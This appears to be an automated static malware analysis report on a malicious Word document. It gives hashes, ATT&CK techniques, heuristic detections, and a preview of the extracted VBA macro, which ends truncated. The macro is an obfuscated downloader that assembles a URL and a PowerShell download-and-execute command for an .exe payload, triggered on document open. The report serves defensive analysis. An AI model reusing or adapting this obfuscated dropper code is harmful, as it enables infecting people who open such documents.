Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 281ae4e896a0fe96…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 229.0 KB
Created: 2017-12-28 17:30:00
Authoring application: Microsoft Office Word
First seen: 2018-01-08
MD5: d674aaa1c87c7522f220b899d8cd7d3c
SHA-1: 7d341274d9a16686d2e6d254f8c687f2941b8b0b
SHA-256: 281ae4e896a0fe96ab28bab6a1da4d9a9d36f2b4d4ff88167df990e50735d0f5
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro uses the Shell() function and constructs a URL, most likely to download and execute a second-stage payload. The presence of AutoOpen and Shell() calls, together with the ClamAV detection 'Img.Dropper.PhishingLure-6443153-0', strongly suggests downloader or dropper functionality.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://wwhno+hnow.aphnoYPn+YPZqiAO5T (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 75829 bytes
SHA-256: 7773c787dbf8461c2b926973205d52b358637c5570b7f251e6cb954f8d63c046
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "dsaDpatw"
Function kDKinqqnXAD()
On Error Resume Next
NfzHwww = (HvKuBLJzNwzuT - Rnd(43 * Tan(mWaGZjwTrKR)) / VIMmZdmWWHBJM * Oct(kFcXaMKnrN) * qsapoDzcJp / Oct(mbWWIzI - Chr(250) + 581 - ChrB(URtDztqUkEh)) - 389 + QwNjkLjiDBjD)
mjAEulA = (dQENPlSjDw - Rnd(43 * Tan(HWkjozol)) / wHcSRdPXms * Oct(HwTWzvvwR) * riJohiTFcDJLlZ / Oct(omvlVuwKiC - Chr(250) + 581 - ChrB(DNjtEqTa)) - 389 + dSdjzwRK)
MNcqikXoC = (DlRCwwG) + Mid("t0onn+hnoico'+'laehno+hnolhno+hnorefuY'+'Pn+YPngio.hno+hnocl/iPFNo/,http:YPn+YPnhno+hno//hno+NrDiFFTaph", 5, 89)
mPCWDcF = (jSBBEENfMsH - Rnd(43 * Tan(pbwzjPXcHkoOml)) / RabTkqXPbpTjAT * Oct(DGFnvjk) * UlIaYzinOSHw / Oct(lYWGRLU - Chr(250) + 581 - ChrB(PjXIFjhI)) - 389 + qNjpGibPwQzBEN)
TFkVza = (SsDPtWsKi - Rnd(43 * Tan(jlvWiXlY)) / XGlfoWSNraMUKS * Oct(VFRVbNoRvOb) * ifizEjDNIjNPsa / Oct(BjRrWSPA - Chr(250) + 581 - ChrB(GQzjjopQNY)) - 389 + iJbHkGFYprCc)
SQdBzw = (TTwfObuPP - Rnd(43 * Tan(qurTvWGKVfk)) / NzYSMpQM * Oct(jqwizBW) * mzIhnropKctWt / Oct(FiMFzGwPEwD - Chr(250) + 581 - ChrB(KDuozVkVjhb)) - 389 + aIjdBNXqIAl)
EvpIrzC = (XzShjjdXPcEBl) + Mid("bIkZj0t05Xenvhno+hn'+'o:hno+hnophMHLwSPYvjL72lDu6qFBz49O6iW", 9, 25)
tLrZHbzmH = (EnidXFj - Rnd(43 * Tan(fItomUdTq)) / CUqarIKGQMqLhD * Oct(zivGMsHrRCAhT) * lbEwuAIKdwZTRp / Oct(cUbpAppiNi - Chr(250) + 581 - ChrB(ucYYqaq)) - 389 + ilmMmDfn)
wnnijTEUi = (brbijMmTYwi - Rnd(43 * Tan(RLGjzDM)) / RaGQUMJwKMTzGm * Oct(SAHMBEVzBIj) * LGnPfCmMAkLO / Oct(CoIMfjzfin - Chr(250) + 581 - ChrB(rrLpvdFHkiw)) - 389 + WznwUabiptpwQ)
rFVYDXl = (ZrSJvtrTpFfl - Rnd(43 * Tan(FzcJKiq)) / omVBojjm * Oct(bEiqRjYwisu) * zzzBzthPRHpzak / Oct(wHHJLjL - Chr(250) + 581 - ChrB(bCOnPEKbqvN)) - 389 + oVArpzWNTOjPj)
GBARJsUnj = (zjsaSYp) + Mid("biB5BhMz2Rh0F20Fkatl25(CYPn+6Cna", 23, 6)
tbRKEtLR = (lWZjCcSH - Rnd(43 * Tan(nqzQXfDdsE)) / mPrmfEGFqwCNYj * Oct(jiAbWZOZzGWJE) * mPwuUaW / Oct(nEzVMRZldYh - Chr(250) + 581 - ChrB(wUcQiWXpsfJ)) - 389 + CDEiGTEIVEvwiA)
IUbfmf = (jvnhcQbw - Rnd(43 * Tan(jRupsKMf)) / NkzpFcjdk * Oct(JPTARfbiIXbwr) * OCMPLLiUOV / Oct(fOuqKzzfmo - Chr(250) + 581 - ChrB(QRcJRjDIoPtcaD)) - 389 + URZKoBwfm)
XCaJDLJXE = (fMwDjmHvBTJNr - Rnd(43 * Tan(KUYJrZfmhIZ)) / dDLTcznuaGFFp * Oct(nBcjEkIjS) * DQOrHtipdqI / Oct(jirLawE - Chr(250) + 581 - ChrB(OSTYmiJ)) - 389 + EphtkiQ)
HwOYtGVXPwY = (zzOczbZFR) + Mid("MZXXZzln)  -REPlacE  ([ChaR]104+[ChaR]'+'110+[ChaR]111),[ChaR]39) )').rEplace('YPn',[StRINg][CHar]39) | &( $SHeLlid[1]+$SHelliD[13]+'X')0q7YquWdLP2nNcACwbfzBzkt3WO", 8, 129)
iHdcnbjT = (hozZbSEjT - Rnd(43 * Tan(vmBuwRFhFmmU)) / uchGcAtRlqsjr * Oct(iMzpvGQ) * hQiLXvQZAf / Oct(ACwuLbjaU - Chr(250) + 581 - ChrB(wJLGLWVI)) - 389 + qNWavQcQcwBMpN)
tsZPCG = (EfziWNmOBRKFIP - Rnd(43 * Tan(TdEZDOJJpNlVn)) / aozoGGMWucY * Oct(zBCLLvSGw) * bpajvVIRkswnb / Oct(LRBIhzicAnO - Chr(250) + 581 - ChrB(GdBqDhij)) - 389 + KOXLqNdrj)
pQsdsaor = (HTFLYvQDozib - Rnd(43 * Tan(diKDbTz)) / voPIkDWj * Oct(haQJJJLQaFv) * YXMaknCDMEcM / Oct(LipDnruUNRE - Chr(250) + 581 - ChrB(rUZwmBOC)) - 389 + WRDhzQUfOd)
PCBXTnhfKo = (qCmRlNPjwK) + Mid("iMnIcmoM9jPno+hnoublic +'+'hno+hno 6hn'+'o+hnoa46nL6a4 + C5hno+hnoXkarapas hno+hno+ 6hno+hnoa4.exe6a4;fYPn+YPnoreachjI", 12, 105)
iFZac = (MaZAutJZz - Rnd(43 * Tan(zomUnOfQ)) / oRIrPACizqkFkT * Oct(BjhcGzuHib) * WcCYbhNwr / Oct(DiJzrOMiPDPUOS - Chr(250) + 581 - ChrB(hDJwuJiQ)) - 389 + iabYPCr)
jUbtf = (NjhUrczmUiv - Rnd(43 * Tan(iOFLRtAOIOocuO)) / jomLWTZwt * Oct(WMSiLTtzUi) * WjADRDWwrFad / Oct(RziSYaER - Chr(250) + 581 - ChrB(oujhjwvu)) - 389 + ZkjJEmIEQDw)
OwiISAAPvjk = (BNjRtiECzpZSHU - Rnd(43 * Tan(nnTMLdsqV)) / KauNMkPs * Oct(dNrHVYn) * iiYfPIzvuFCM / Oct(IWOJjEJokE - Chr(250) + 581 - ChrB(ZErDvjzn)) - 389 + tOIwcuRzRR)
EjwzVOjDJ = (bYzwXdOiiZOY) + Mid("hziPSW93zcRvlfcjbZ+hno5Xbcdhn'+'o+hno)hnYPn+YP'+'no+hno{try{C5XhYPn+YPnno+hnofraYP
... (truncated)